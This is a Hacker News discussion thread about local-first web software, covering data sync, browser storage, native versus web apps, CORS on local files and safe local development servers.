I wrote a static web page and accidentally started a community (2023)
226 points
28 days ago
| 24 comments
| localfirstweb.dev
| HN
dmwilcox
27 days ago
[-]
I love the localfirst idea but I don't love web browsers. They're the platform everyone has to have but shoehorning 40 years of UI development and products into them seems like a mistake.

I can see why local UI development fell out of favor, but it is still better (faster, established tooling, computers already have it so you don't have to download it). I can't help but feel like a lighter weight VM (versus electron) is what we actually want. Or at least what _I_ want, something like UXN but just a little more fully featured.

I'm writing some personal stuff for DOS now with the idea that every platform has an established DOS emulator and the development environment is decent. Don't get me wrong this is probably totally crazy and a dead end but it's fun for now. But a universally available emulator of a bare bones simple machine could solve many computing problems at once so the idea is tempting. To use DOS as that emulator is maybe crazy but it's widely available and self-hosting. But to make networked applications advancing the state of emulators like DOSBox would be critical.

Actually local first, maybe the way forward is first to take a step back. What were we trying to accomplish again? What are computers for?

reply
JodieBenitez
27 days ago
[-]
> shoehorning 40 years of UI development and products into them seems like a mistake.

It wouldn't be such a mistake if it was done well. For all the bells and whistles web UIs have, they still lack a lot of what we had on the desktop 30 years ago, like good keyboard shortcuts, support for tab in forms, good mask inputs, and so on.

reply
raelmiu
27 days ago
[-]
Love this.

What are computers for?

Local first could be the file format that allows us to use devices without cloud services. Back to file first, vendors of software apps, pay for software once (or one year of updates or whatever).

It's s new horizon.

reply
rollcat
27 days ago
[-]
I would still prefer to have my stuff synced between devices. Files are OK for data that doesn't change much (your music/photo/book library) - Syncthing works great there.

CRDTs allow for conflict-free edits where raw files start falling short (calendars, TODOs, etc). I'd love to see something like Syncthing for CRDTs, so that local-first can take the next logical step forward and go cloud-free.

reply
WorldMaker
27 days ago
[-]
The other day I was riffing on ideas on what if Browsers had a third Storage called `roamingStorage`. Keep it the simple, stupid key/value store interface of localStorage and sessionStorage, but allow it to roam between your devices (like classic Windows %RoamingAppData% on a network/domain configured for it). It doesn't even "need" a full sync engine like CRDTs at the browser level, if it did something as simple and dumb as basic MVCC "last write wins, but you can pull previous versions" you can easily build CRDT library support on top of it.

The hardest trick to that would be securing it, in particular how you define an application boundary so that the same application has the same roamingStorage but bad actor applications can't spoof your app and exfiltrate data from it. My riffing hasn't found an easy/simple/dumb solution for that (if you want offline apps you maybe can't just rely on website URL as localStorage mostly does today, and that's maybe before you get into confusion about multiple users in the same browser instance using the app), but I assume it's a solvable problem if there was interest in it at the browser level.

reply
satvikpendem
27 days ago
[-]
Local first access control via cryptography: https://www.inkandswitch.com/beehive/notebook/
reply
rollcat
26 days ago
[-]
Look up CloudKit[1], many of these questions have been answered for Apple-native apps, but perhaps it's not obvious how to translate that to the web-world, or how to keep the object storage decentralised (but self-hosted shouldn't be a problem).

I'm also firmly in the native app camp. And again, Apple did this right. The web interface to iCloud works great from both Firefox and Chromium, even on OpenBSD, even with E2EE enabled (you have to authorise the session from an Apple device you own, but that's actually a great way to protect it and I don't mind the extra step).

It's probably harder to answer those questions if you can't build the solution around a device with a secure element. But there's a lot of food for thought here.

[1]: https://developer.apple.com/documentation/cloudkit/

reply
WorldMaker
26 days ago
[-]
> I'm also firmly in the native app camp.

Then you are answering the wrong question. I want a "web native" answer and proposed a simple modification of existing Web APIs. As a mixed iOS/Windows/Linux user, I have selfish reasons to want a cross-device solution that works at the Firefox standardized level. Even outside of the selfish reason, the kinds of "apps" I've been building that could use simple device-to-device sync have just as many or sometimes more Android users than Apple device users. I've also seen some interesting mixes there too among my users (Android phone, iPadOS device, Windows device; all Chrome browser ecosystem though).

> It's probably harder to answer those questions if you can't build the solution around a device with a secure element.

Raw Passkey support rates are really high. Even Windows 10 devices stuck on Windows 10 because no TPM 2.0 still often have reasonably secure TPM 1.0 hardware.

Piggybacking on Passkey roaming standards may be a possibility here, though mixed ecosystem users will need ways to "merge" Passkey-based roaming for the same reasons they need ways to register multiple Passkeys to an app. (I need at least two keys, sometimes three, for my collection of devices today/cross-ecosystem needs, again selfishly at least.)

reply
rollcat
24 days ago
[-]
> Then you are answering the wrong question. I want a "web native" answer and proposed a simple modification of existing Web APIs.

I don't see why this mechanism shouldn't be available both on the web and in native apps. The libraries would just implement the same protocol spec, use equivalent APIs. Just like with WebRTC, RSS, iCal, etc. And again, ideally with P2P capability.

> [...] that works at the Firefox standardized level.

What about a W3C standard? Chrome hijacked the process by implementing whatever-the-hell they like and forcing it upon Firefox & Safari through sheer market share. It would be good to reinforce the idea that vendor-specific "standards" are a no-no.

It also just doesn't work the other way: Firefox tried the same thing with DNT, nobody respected it.

> Piggybacking on Passkey roaming standards may be a possibility here [...]

WebAuthn sounds good, that kinda covers the TPM/SEP requirement. Native apps already normalised using webviews for auth. I wonder if there's a reasonable way to cover headless devices as well, but self-hosted/P2P apps like Syncthing also usually have a web UI.

> [...] again selfishly at least.

No problem with being "selfish". Every solution should start with answering a need.

reply
invalidator
27 days ago
[-]
> I can't help but feel like a lighter weight VM (versus electron) is what we actually want. Or at least what _I_ want, something like UXN but just a little more fully featured.

That's basically the JVM, isn't it?

It's interesting to think how some of the reasons it sucked for desktop apps (performance, native UI) are also true of Electron. Maybe our expectations are just lower now.

reply
dmwilcox
27 days ago
[-]
I got super interested in Clojure and the java UI frameworks a year ago. But the languages on top of languages scared me. I wanted something simpler, so now I'm writing x86-16 and making bitmapped fonts and things. Probably not a good idea for anyone with a timeline but it's been educational
reply
invalidator
27 days ago
[-]
> Probably not a good idea for anyone with a timeline

It's not completely crazy. Software was developed by much smaller teams and got out the door quickly in that era.

reply
rglullis
27 days ago
[-]
From something I wrote in 2021 [0] and based on my experience working on a "browser-based OS" in 2013:

    What we need is to have a device-transparent way to see our *data*. We got so used to the idea that web applications let us work from "dumb terminals" that we failed to realize that *there is no such thing as a dumb terminal anymore*. With multi-core smartphones, many of them with 4, 8, 12, 16GB of RAM; it's not too hard to notice that the actual bottlenecks in mobile devices are battery life and (intermittent and still relatively expensive) network connectivity. These are problems that can be solved by appropriate data synchronization, not by removing the data from the edge. 

    One of the early jokes about web2.0 was that to have a successful company you should take an Unix utility and turn it into a web app. This generation of open source developers are reacting to this by looking at successful companies and building "self-hosted" versions of these web apps. What they didn't seem to realize is that **we don't need them**. The utlities and the applications still work just fine, we just need to manage the data and how to sync between our mobile/edge devices and our main data storage. 

    If you are an open source developer and you are thinking of creating a web app, do us all a favor and ask yourself first: do I need to create yet-another silo or can I solve this with Syncthing?
[0]: https://raphael.lullis.net/thinking-heads-are-not-in-the-clo...
reply
tommica
27 days ago
[-]
Goddammit, of course the closest edge/node to the user is their own damn device... I should have realized that long time ago
reply
AlienRobot
27 days ago
[-]
That's a very interesting blog post and certainly the way I wish things headed.
reply
rssoconnor
26 days ago
[-]
> can I solve this with Syncthing?

I recently found out that Syncthing is ending Android support. :(

reply
oneeyedpigeon
27 days ago
[-]
This ties in nicely with the bookmarking discussion about Pinboard. I particularly like the following quote from this article:

> Now, of course, there are many advantages to this shift: collaboration, backups, multi-device access, and so on. But it’s a trade! In exchange, we’ve lost the ability to work offline, user experience and performance, and indeed true dominion over our own data.

I’ve decided that the advantages of storing my bookmarks locally far outweigh the chance that I'll want to access them from a different device or collaborate with someone else on them. Yes, it means I've created something of a 'silo', but I'm starting to think that's not a bad thing.

reply
julianeon
27 days ago
[-]
> I’ve decided that the advantages of storing my bookmarks locally far outweigh the chance that I'll want to access them from a different device or collaborate with someone else on them. Yes, it means I've created something of a 'silo', but I'm starting to think that's not a bad thing.

Why don't you store those bookmarks as markdown files and then upload them to a private repo you can read on other devices and even your phone through the GitHub mobile app? If they're bookmarks, they'll work perfectly as links in markdown which you can click in the GitHub app.

Note: I pay $4/mo for GitHub private repos and I absolutely defy anyone to show me a better deal in any SaaS company. I open the GitHub mobile app at least 10 times a day. This is the only subscription service that is inarguably worth it as far as I'm concerned.

reply
8n4vidtmkvmk
25 days ago
[-]
Aren't GitHub private repos frees now?
reply
lgvld
22 days ago
[-]
yes there are ;-)
reply
canadiantim
27 days ago
[-]
May I ask what the bookmarking discussion about Pinboard is? I tried looking through all of the recent articles but find nothing about pinboard.

What’s your current solution for local bookmarks?

reply
oneeyedpigeon
27 days ago
[-]
This one: https://news.ycombinator.com/item?id=43022098

I'm right in the middle of setting it up. Basically, curl and a bunch of bash scripts.

reply
wim
27 days ago
[-]
Another aspect of local-first I'm exploring is trying to combine it with the ability to make the backend sync server available for local self-hosting as well.

In our case we're building a local-first multiplayer "IDE for tasks and notes" [1] where the syncing or "cloud" component adds features like real-time collaboration, permission controls and so on.

Local-first ensures the principles mentioned in the article like guaranteed access to your data and no spinners. But that's just the _data_ part. To really add longevity to software, I think it would be cool if it would also be possible to guarantee the _service_ part also remains available. In our set up we'll allow users to "eject" at any time by saving a .zip of all their data and simply downloading a single executable (like "server.exe" or "server.bin"). The idea is you can then easily switch to the self-hosting backend hosted on your computer or a server if you want (or reverse the process and go back to the cloud version).

[1] https://thymer.com/

reply
nsriv
27 days ago
[-]
This looks like a great project and something that could be adapted into what I've been looking for unfruitfully (an OSS/self-hosted and cross platform version of Noteplan 3 for family use). Not expecting too much movement on your part into the crowded task management space but the screenshots and examples gave me the same feeling.

Signed up for early access and looking forward to it!

reply
cxr
24 days ago
[-]
> To really add longevity to software, I think it would be cool if it would also be possible to guarantee the _service_ part also remains available. In our set up we'll allow users to "eject" at any time by saving a .zip of all their data and simply downloading a single executable (like "server.exe" or "server.bin"). The idea is you can then easily switch to the self-hosting backend hosted on your computer or a server if you want

Too few people are taking advantage of Redbean <https://redbean.dev/> and what it can do. Look into it.

reply
pillefitz
26 days ago
[-]
If I can host the backend myself, does it imply it's not a commercial offering?
reply
wim
26 days ago
[-]
I think it's not too different from downloadable software, so it doesn't rule out commercial services (we plan on both paid and free versions).
reply
tobilg
26 days ago
[-]
I created https://sql-workbench.com a while ago, mainly to let people analyze data that's available via http sources, or on their local machines, w/o having to install anything.

A recent project is https://shrink.video, which is using the WASM version of ffmpeg to shrink or convert video in the user's browser itself, for privacy and similar reasons mentioned before.

reply
yonz
26 days ago
[-]
Nice
reply
runarberg
27 days ago
[-]
I’m working on a kanji learning app (shodoku.app) which some might say fulfills this ‘local first’ philosophy. Currently it is hosted on GitHub pages and relies on static assets (such as dictionary files, stroke order SVGs, etc.) which requires a web connection to fetch. However when I make this a PWA (which I’ll do very soon) these will all be stored in the browser cache, effectively making it work offline.

I store the user data (progress, etc.) in an indexedDB in the user’s browser and I have to say:

> No spinners: your work at your fingertips

is not true at all. indexedDB can be frustratingly slow on some devices. It also has a frustratingly bad DX (even if you use a wrapper library like idb or dexie) due to limitations of the database design, which forces you into making bad database designs which further slows things down for the user (as well as increases the total storage consumption on the user’s device).

I also wished browsers offered a standard way to sync data between each other, even though you can share your firefox tabs between your phone and computer, you can‘t get the data from indexedDB on the same site between your computer and phone. Instead you have to either use a server or download and drop the data between the two clients.

indexedDB feels like a broken promise of local first user experience which browser vendors (and web standard committees) have given up on.

reply
shayansm1
27 days ago
[-]
I was introduced to Local First while watching this conference by Martin Kleppmann (the author of Designing Data-Intensive Applications book): https://martin.kleppmann.com/2023/06/29/goto-amsterdam.html. It's worth watching!
reply
sirjaz
27 days ago
[-]
This gives me hope that we can get native apps back again, and collaborative work through them without the browser or a central authority
reply
kridsdale1
26 days ago
[-]
Many of us never stopped writing native apps.

When I was at Apple (2010-2015) every app was Local First. In fact they legally had to be to be sold in Germany, where iCloud cannot be mandatory (they have a history of user data being abused).

You’ll notice when the network goes down all your calendars email contacts and photos are still there. The source of truth is distributed.

Client side apps writing to local db with background sync (application specific protocols) works excellently. You just don’t write your UI as a web page.

reply
hidelooktropic
27 days ago
[-]
Love this. I had always referred to this concept with the rallying cry: "'offline' is not an error"
reply
physicles
24 days ago
[-]
Reminds me of those “skateboarding is not a crime” stickers
reply
krishadi
27 days ago
[-]
> But I was equally surprised by how little this was being discussed, or (as far as I could tell) practiced in the real world. While there seemed to be endless threads on Twitter about server-side React (to get the UI generation closer to the data), no-one was talking about the opposite: moving the data to be closer to the UI, and onto the client!

This, I've wondered for a while. There is plenty of talk about server side rendering, which I don't think is useful for many apps out there. SSR is quite wasteful of the resources on the client side that can be made useful. And, I've seen many apps being developed with "use cliënt" littered all over, and that begs to wonder why do you even want SSR in your app.

reply
zwnow
27 days ago
[-]
Wasn't the reason for SSR to have more control over security and offload work from the client to the server? Let's not forget that the majority of the worlds population is using slow ass tech. We cant simply put huge workloads to the client.
reply
indymike
27 days ago
[-]
I think the main drive for the modern version SSR was SEO. The workload part? the whole point of SPAs was to move compute - especially fancy UI compute down to the client so the server only had to move data... so we're just completing the circle again.
reply
dplgk
26 days ago
[-]
Funny that bad SEO was a big strike against Flash and a reason to move to HTML5
reply
krishadi
27 days ago
[-]
It was mainly for SEO, and to some extent protecting against website scrapers and crawlers.
reply
ZYbCRq22HbJ2y7
27 days ago
[-]
SSR just means you render on the server, it isn't whatever you are describing.
reply
krishadi
27 days ago
[-]
It is exactly what I am talking about. Rendering the component on the server, takes up resources, as opposed to just sending that data to the client, and the client rendering it.

In Nextjs, "use client" is used to force the rendering to take place in the client, because many components cannot me rendered in the server. For example maps. In this case, it's unnecessary to use an SSR framework.

reply
bzmrgonz
27 days ago
[-]
You should know that the website localfirstweb.dev shows as blacklisted on avast and avg viruses. It doesn't like a site reference called strut.io. claiming it is a card stealer.
reply
yonz
26 days ago
[-]
That's just nuts, I'll look into it. I know the guy that built strut and I run the lfw site.
reply
lubujackson
27 days ago
[-]
Very cool. Coincidentally I just made a basic calculator with stored variables (https://calc.li/) with this philosophy in mind, though I didn't know there was a bigger movement around the idea! Mostly, I didn't want to bother with a backend or even cookies, so I just store everything in localStorage (which is criminally under-used IMHO).
reply
staticelf
27 days ago
[-]
Love the idea and the community aspect!

The issue with local first web dev in my experience is two fold:

1. It's super hard. The problem of syncing data is super hard to solve and there is little support from modern tooling. Mostly because it differs vastly on how you should handle it from app to app.

2. Very few that live in the west or people who pay for software are offline in longer stretches. There is simply very little to no requests for making apps work offline. I would argue to opposite that it probably is mostly bad business because you will get stuck on technical details due to #1 being so hard to solve. Even people who say they will use the app offline are never offline in my experience (from working on a real app that worked offline).

I work on an app that has clear offline benefits, although, pretty much no one will use it offline in practice and where I live, people have 5G access nowadays even at places that used to be offline, aka trains, tunnels etc. Even so, I plan to make my app offline supported but only after I have success with it.

reply
Dwedit
27 days ago
[-]
Hey browser makers, please allow file:// URLS to actually be able to load other files in the same directory without giving a CORS error. You can't even run a JS file from the same directory! That's what's really killing "local first".
reply
IanCal
27 days ago
[-]
As usual, this sounds great for the nice players.

Unfortunately that means if you download an html file and double click on it then it can send anything in your downloads folder to anywhere else.

reply
jagged-chisel
27 days ago
[-]
Download HTML file (and dependencies), open local file, local JS requests from internet, and CORS error. Why can it not work like this?
reply
IanCal
27 days ago
[-]
> local JS requests from internet

I really don't understand what this means.

reply
jonhohle
27 days ago
[-]
If you load a file using the “file” protocol, it shouldn’t be able to load other resources (JS from the internet) with non-file protocols to protocols (http, https, etc.) to non null-string domains. because that would violate cross origin request sharing (CORS).

I too like local HTML and would love to see it restored without requiring a local server. If I spin up a local Webrick to serve anything from my file system, I’m no better off (except maybe that it’s scoped to a particular directory and children).

reply
advisedwang
27 days ago
[-]
People expect to be able to download an HTML file and for it still to be able to load an image with an external URL. If it can do that, it can exfiltrate (eg js can put data loaded from a local file in the src for an image on a external server).
reply
jagged-chisel
27 days ago
[-]
When I save an HTML page, the browser downloads other resources the page wants. This is how it should work for The Average User. Saving just the HTML should be the exception for more technical users.
reply
bandie91
27 days ago
[-]
or just separete what are "document" and what are "application", already, and don´t mix them up. i would not even mind if there was a separate "docjs" - JS code for which only the document is visible and only can do stuff upon it, and the "appjs" which can do all of the wild js stuff which our great browser vendors come up with. this way, in various cases, you can turn off the potentially harmful appjs, while keep the docjs for validating forms, change layout, implementing tinymce, etc...

IMO the problem rooted in co-mingling documents and applications on a web page / in a HTML file. let the user save documents in .html: then it should not be able to do any harm - it's a digital sheet of paper! and web applications in, say, .hta: then he should not expect any more isolatedness then for a downloaded .exe or .sh file; and the user client program should treat it with due care when downloading, eg. by put it in a separate subfolder, set SELinux context, etc...

reply
diggan
27 days ago
[-]
Luckily, starting a local HTTP server for development is more-or-less a one-liner for a long time, in most OSes (maybe even Windows might ship with Python nowadays?):

    python -m http.server 8080
If if you're stuck with python2

    python -m SimpleHTTPServer 8080
At least this doesn't introduce the security issues you'd see with any file:// resource being able to load other file:// resources
reply
8organicbits
27 days ago
[-]
It's not perfect either:

https://docs.python.org/3/library/http.server.html#http-serv...

You should also add a `--bind 127.0.0.1` so you don't expose the site to everyone on your network.

reply
vindex10
27 days ago
[-]
Only slightly related, but port binding in Docker also binds to 0.0.0.0 by default: `-p 8000:8000`

To be safe, this should be used instead: `-p 127.0.0.1:8000:8000`

reply
janci
27 days ago
[-]
It also bypasses firewall (ufw on ubuntu)
reply
rzzzt
27 days ago
[-]
Yes and no, it's modifying the NAT table and so traffic will not be subjected to inbound rules where you would normally add an "allow HTTPS"-style rule: https://docs.docker.com/engine/network/packet-filtering-fire...
reply
diggan
27 days ago
[-]
In what way is that "No"? The docs say:

> Docker routes container traffic in the nat table, which means that packets are diverted before it reaches the INPUT and OUTPUT chains that ufw uses. Packets are routed before the firewall rules can be applied, effectively ignoring your firewall configuration.

So docker is "effectively" ignoring your firewall in the case of ufw. I don't see how it can be considered to not ignoring your firewall when it ignores the rules you've setup.

reply
rzzzt
26 days ago
[-]
NAT rules are still firewall (netfilter, iptables - note the plural) territory, ufw is a frontend for iptables to simplify creating rules.

Does Docker violate the principle of least surprise? Yes. Was I bitten by this behavior? Definitely. Does it bypass the firewall? No.

reply
diggan
26 days ago
[-]
I dunno. If I use UFW on Ubuntu, I use it as a firewall, and applications that ignores my firewall, I'd consider them to be ignoring my firewall, regardless if the details say that it's still using NAT rules so technically it's just ignoring one firewall/something not called a firewall, even though it ignores the firewall you've setup.

To be frank, it kind of feels like the kind of technical nitpick argument I'd read from a Docker Inc employee trying to somehow defend ignoring the user's firewall.

The end result is that you setup rules in UFW, and Docker ignores them.

reply
jonhohle
27 days ago
[-]
That should really be the default behavior.
reply
diggan
27 days ago
[-]
Yeah, that's a good callout, thanks. Not sure why they took the less secure approach for something that is intended as a development environment, but I think I feel like that for lots of decisions in Python so maybe not that weird in the grand scheme of things.
reply
WorldMaker
27 days ago
[-]
> (maybe even Windows might ship with Python nowadays?)

Windows doesn't ship with Python, but it does have a silly thing where if you type python in a command shell of your choice it will try to auto-install python. (When it works it is kind of magic, when it doesn't work it's a pain to debug the PATH problem.)

It's not exactly a one-liner, but in an off-the-shelf Windows install it is a short script to create a simple static file web server inside PowerShell.

Also there are npm and deno packages/CLIs that are easy to install/run for one-liners if you want to install something more "web native" than Python. `npx http-server` is an easy one-liner with any recent Node install.

reply
tlarkworthy
27 days ago
[-]
I have made a notebook environment inside a single html file. You have to map dependencies in an importmap to blob URLs and it works. I have a single file website online. And you can click download to play with it locally

https://tomlarkworthy.moldable.app/index.html

You can turn off network and the download works.

reply
mlajtos
27 days ago
[-]
Without looking into the source – GoldenLayout, right? :)
reply
bsenftner
27 days ago
[-]
Very nice, written up anywhere?
reply
tlarkworthy
27 days ago
[-]
still a WIP but I will write it up properly soon.
reply
genewitch
26 days ago
[-]
Can this be a self-contained alarm and journaling app for cellphones?

Because I can't think of a way to do that without serviceworkers. I mean a way that doesn't involve the end user reading a paragraph of instructions, based on their "OS".

Anyhow, sorry, I just can't tell what it does from the confines of that demo and a cellphone browser...

reply
tlarkworthy
24 days ago
[-]
No I think you need service workers for notifications. You could do journalling but it's emits a file when saving by default. Index dB works so maybe that's a possability
reply
jstanley
27 days ago
[-]
You can totally load a JS file from the same directory, I do it all the time.

I recall you can't use web workers, but just loading a JS file with <script> tags is fine.

reply
Springtime
27 days ago
[-]
You can run non-module scripts, yes, though not modules.

Though it's easy enough to run a caddy local server. It was easier in the past, in earlier caddy versions one could just place the caddy binary in PATH and launch `caddy` from any directory to auto serve a local server, now it requires more arguments or a config file.

reply
jankovicsandras
27 days ago
[-]
I think the following works in Firefox. WARNING: this is a security risk obviously.

about:config -> security.fileuri.strict_origin_policy -> false

source: https://stackoverflow.com/questions/58067499/runing-javascri...

reply
01HNNWZ0MV43FF
27 days ago
[-]
That and, bring back the "new tab" custom URL, and, a way to securely host local servers without root but also without just praying that another app doesn't port-squat me
reply
azornathogron
27 days ago
[-]
Localhost is an entire /8, so you have a few million possible addresses you can bind to if you want, all on whatever your preferred dev server port is.
reply
marbu
27 days ago
[-]
Use https://github.com/daisylb/newtab or other extension to load a home page when you open a new tab.
reply
oneeyedpigeon
27 days ago
[-]
I use an extension for the former and the latter has never been a problem for me using ports > 8000.

+1 for having your own local 'tab home page'!

reply
maksimur
27 days ago
[-]
You can bind to port 0 and have the OS then pick an available port for you.
reply
maksimur
27 days ago
[-]
I don't understand the downvote.

OP said

> a way to securely host local servers without root but also without just praying that another app doesn't port-squat me

Binding to port 0 is a solution. I tested it and I always get a port not used by other programs.

reply
oneeyedpigeon
27 days ago
[-]
I guess the main disadvantage is you can't reliably link to anything. Maybe not a problem if you only ever need one local server.
reply
adolph
27 days ago
[-]
Maybe this is an opportunity. Is there already a “DNS for ports” whereby the hosts file is propagated with application process identifiers that are mapped to localhost:port in hosts file?
reply
bandie91
27 days ago
[-]
SRV records do this.

hosts file (the hosts NSS database) does not speak DNS.

however I guess this line of thought comes from that web developers want a number of *.dev.myproject.net domain names to use in URLs and handle by different web listener processes. why don't just run a nginx as reverse proxy for all of your *.dev.myproject.net domains? update your port number ↔ domain name in nginx config; reload is quite cheap.

reply
jmbwell
27 days ago
[-]
Careening back to inetd and /etc/services …
reply
adolph
27 days ago
[-]
In some ways it is an inversion of inetd. Instead of something that listens to a bunch of ports and launches a port corresponding process, the user has a service that will listen to a random port and they wish to address it in a human-readable kind of way.

As far as I know, the hosts file does not afford a port number so a solution would look similar to a proxy on a known port like 443 listening for a particular domain name that hosts routes to localhost and the proxy routes to the service on port whatever. Also need to set up local CA to sign a cert for each of the hostfile domain names. . .

0. https://www.baeldung.com/linux/mapping-hostnames-ports

reply
genewitch
26 days ago
[-]
Isn't this "service discovery", which, at least, apple had 23 years ago "bonjour"? I'm not claiming that stuff like bonjour (I'm referring to the apparently infringing "rendezvous") and upnp did what we're discussing; but you could hack em to do it.

I know I generally use fing in a pinch, or nmap, or ask the DHCP server for all the hostnamr<->ip mappings and then nmap -A - t5 (that's threat level five - the system I use)

Is this thing on

reply
dylan604
27 days ago
[-]
It's amazing to me all of the fancy new ways eventually evolve into the thing they were trying not to be in the first place. We see this time and time again. I've been around long enough to have seen it in several situations to the point that at the start of the trend someone looks like the old dog refusing to learn a new trick, then eventually people realize they could have saved a lot of time/effort/money by taking the old's advice and experience.
reply
genewitch
26 days ago
[-]
I have said it before and I am unsure if I stole it: you can recreate nearly any "service" the web/internet has to offer today with only the RFCs prior to April, 1995, with the caveat that I'm technically fine with HTTP; I haven't given it much thought.

I think it was LogStash or Summit Patchy Project, that let you use IRC as a sync for redirecting logs or making a copy. So I made a PCI compliant logging service, immutable ircd (ro fs) that logged to itself via eggdrop locally. All little cattle VMs would have thier logs sourced and synced via logstash to an IRC channel for the vertical the VM "belonged to". All the irc stuff was on an append-only mount on the ircd server, so if audit just snapshot that mount and hand it over.

NOC was in the channels. I think some teams set up dashboard widgets that triggered on irc events.

All that was a POC done completely to prove that it could be done using only stuff from pre-1996 RFCs. I'm sure the company I built it for went with some vendor product instead and I don't blame them, I wouldn't have maintained that - you ever set up ircd? The volume of traffic just for logs was already fun to deal with.

Pedants: I'm working from 15 year old memories and I changed a few details to protect the innocent. I can't remember the project name other than it was a play on "BI" for business intelligence.

reply
maksimur
27 days ago
[-]
That's a good point. I assumed it being a single local server per app.
reply
eadmund
27 days ago
[-]
Support for Unix sockets would be a gamechanger.
reply
rpmisms
27 days ago
[-]
If it's too big to include in a script tag, you don't need it. At least, that's my rule.
reply
begueradj
27 days ago
[-]
From a security perspective, that's a bad thing to do.
reply
quink
27 days ago
[-]
> "local first"

Listening on 127.0.0.1:80 is local first and not being routable is in fact local-only. Its common alias ‘localhost’ even has ‘local’ in the name.

reply
IanCal
27 days ago
[-]
That requires having an actual server though.
reply
_kidlike
27 days ago
[-]
which is extremely easy to do. Most programming languages have a one-liner to do it.
reply
oneeyedpigeon
27 days ago
[-]
The best solution would allow both. Nothing quite as portable as shoving a .html file on a usb stick.
reply
jagged-chisel
27 days ago
[-]
But then I want my non-technical users to experience the same benefits. So I guess I’m building an app with a web server included.
reply
AlienRobot
27 days ago
[-]
I don't know why don't we have something like Java but for Javascript. Then we don't need Electron anymore.
reply
cxr
24 days ago
[-]
Huh?
reply
evrimoztamur
27 days ago
[-]
I'm mostly resorting to self-hosting tools on my tiny server these days, but I would love it if I could run local web apps on a synced folder (a la Dropbox), and access them on my computer and mobile phone alike. With the CORS bypasses, it would be so convenient to have your own personal kanban or finance apps running and synced across multiple platforms, and remove the barrier of entry for many.
reply
zozbot234
27 days ago
[-]
Why not use data: or blob: URI's instead? That ought to allow you to load resources from the "same" file, obviating security concerns from loading external resources.

(Alternately you could bundle multiple files into a single ePub, though that requires a few adjustments compared to simple HTML. It's a widely supported format and allows for scripting.)

reply
jFriedensreich
27 days ago
[-]
Because of various security issues, what you really want is something like this web standard going forward: https://developer.chrome.com/docs/web-platform/web-bundles

and combine that with the js file APIs for working with data files.

reply
giancarlostoro
27 days ago
[-]
I think at one point Firefox used to let you open a directory and start a web server in said directory for this very reason.
reply
carlosjobim
27 days ago
[-]
It's a prominent checkbox in the Safari developer settings to enable this.
reply
paulddraper
27 days ago
[-]
You can run a JS file from any directory.
reply
brianzelip
27 days ago
[-]
A couple podcast episodes featuring the author (mostly regarding his TinyBase project):

- https://www.devtools.fm/episode/67

- https://www.localfirst.fm/12

reply
rurban
27 days ago
[-]
There really must be something less bloated for local static pages. Embedded SQLite and react just for a few nested table queries? Come on, js has maps and hashtables. React for displaying generated content? My DOM inserter is half a page, and loads instantly
reply
nosefurhairdo
27 days ago
[-]
The "static page" is referring to https://localfirstweb.dev/. TinyBase, the tool with embedded SQLite and React support (among other things) is for reactive (non-static) web applications. Native JavaScript language feature like maps are not an adequate replacement for the functionality offered by TinyBase.
reply
rurban
27 days ago
[-]
What I said. Local embedded SQLite and React is not tiny, it's huge. And slow.

And native JS only is adequate for tiny first web. Clients do care about ms vs 5s load-times.

reply
dgb23
27 days ago
[-]
I agree on React, but not necessarily on SQLite. It's made for use cases like this and it can handle quite a lot of data with a humble footprint.

Ironically, if you use something browser native indexeddb plus JS instead, you are also likely indirectly using SQLite as far as I know.

reply
nosefurhairdo
27 days ago
[-]
The react module for TinyBase is optional, and if you're just using their store module you only add 5.3kb gzipped to your final bundle, hence the name TinyBase.

I also don't think you understand the complexity of the features that TinyBase is offering. It's possible you don't personally need these features, but critiquing the software for not being totally minimalistic is a bit silly.

reply
nsonha
27 days ago
[-]
how do you say, implement full-text search in a local first manner? How about vector search? (don't even know if it's a thing yet, sounds possible these days). Imagine saving a local copy of a docs site (a sizable set of pages) and have search and stuff working perfectly
reply
oneeyedpigeon
27 days ago
[-]
Build the index as a static file and query it using js? This has been my approach so far — admittedly, this isn't with millions of pages, but I'll continue to use it for as long as it works. When hosted on the internet, the search is still blazingly fast, way better than most other sites I come across.
reply
VenturingVole
27 days ago
[-]
For a very similar scenario I'm currently looking to use PGlite: https://pglite.dev/ which is a 3MB WASM build of Postgres which also includes pgvector.
reply
arccy
27 days ago
[-]
stuff like https://lunrjs.com/ works
reply
nsonha
22 days ago
[-]
Can it index images by semantic, that is what vector search can do
reply
ddanieltan
26 days ago
[-]
Related idea to local-first: https://stephango.com/file-over-app
reply
yaky
27 days ago
[-]
I don't understand, offline-capable software is now being pitched as something profound and genius? There was software before the widespread Internet access.
reply
armarr
27 days ago
[-]
This is trying to give users all the benefits of being cloud connected (sync, collaboration, etc) without the requirement of always being connected.
reply
giancarlostoro
27 days ago
[-]
I built and offline friendly app, was not offline first, but it was my first PWA, the idea was that a pilot could have our web page open at high altitudes, potentially with bad service, and they could still interact with anything, once back online, it would push any changes they made. I implemented it with vanilla JS.

The only annoying part was detecting when the browser was back online, I used some hacky solution since there was no native API for it for any browser at the time, but it worked.

reply
jandrese
27 days ago
[-]
> You see, connectivity is generally good on a boat - wifi, cell coverage, and satellite options abound - so we survive. But when it isn’t good, it really isn’t good. And then suddenly, it dawns on you just how much of your life is beholden to the cloud. Your documents don’t load. Your photos don’t sync. Your messages don’t send. Without necessarily consciously realizing it, we have all moved most of our online existence to other people’s computers!

Welcome to the world a huge chunk of the population lives in. It drives me crazy how quick people were to jump onto cloud computing without ever asking the question "how well does it work when my Internet connection sucks?"

reply
nottorp
27 days ago
[-]
Well, it's always amusing how they discover that applications can run locally without depending on someone else's servers and maybe without pulling unverified code from 50 random repos.

Next they'll discover native applications! Innovation!

Maybe after that they'll even discover that you can give a shit about the user's battery/power consumption and ram consumption again!

reply
paulgb
27 days ago
[-]
The key in local-first is the _first_. The stated goal is to give people the benefits of local applications (no spinners, data outlives the app) with the benefits of cloud applications (low-friction collaboration).
reply
kridsdale1
26 days ago
[-]
reply
satvikpendem
27 days ago
[-]
This is unnecessarily combative. Local-first does not mean local-only, it means that the app should also work on the internet, meaning that you need to solve sync, which is why it took some time for the concept to gain traction. CRDTs for example are relatively new.
reply
kridsdale1
26 days ago
[-]
I mean, native apps have been cloud syncing for more than 20 years.
reply
gessha
27 days ago
[-]
As satisfying as it is to point at local first software and say they forgotten history, it’s important to remember that a lot of development happens where the friction is lowest.

The target platform for many local first apps is browser because you don’t have to mess with EXE/DMG/AppImages.

The goal is to ship, not to ship the most efficient application possible.

reply
ngcc_hk
27 days ago
[-]
Seems need pointer and example. What is this mobile at your fingertips tip local but share …
reply
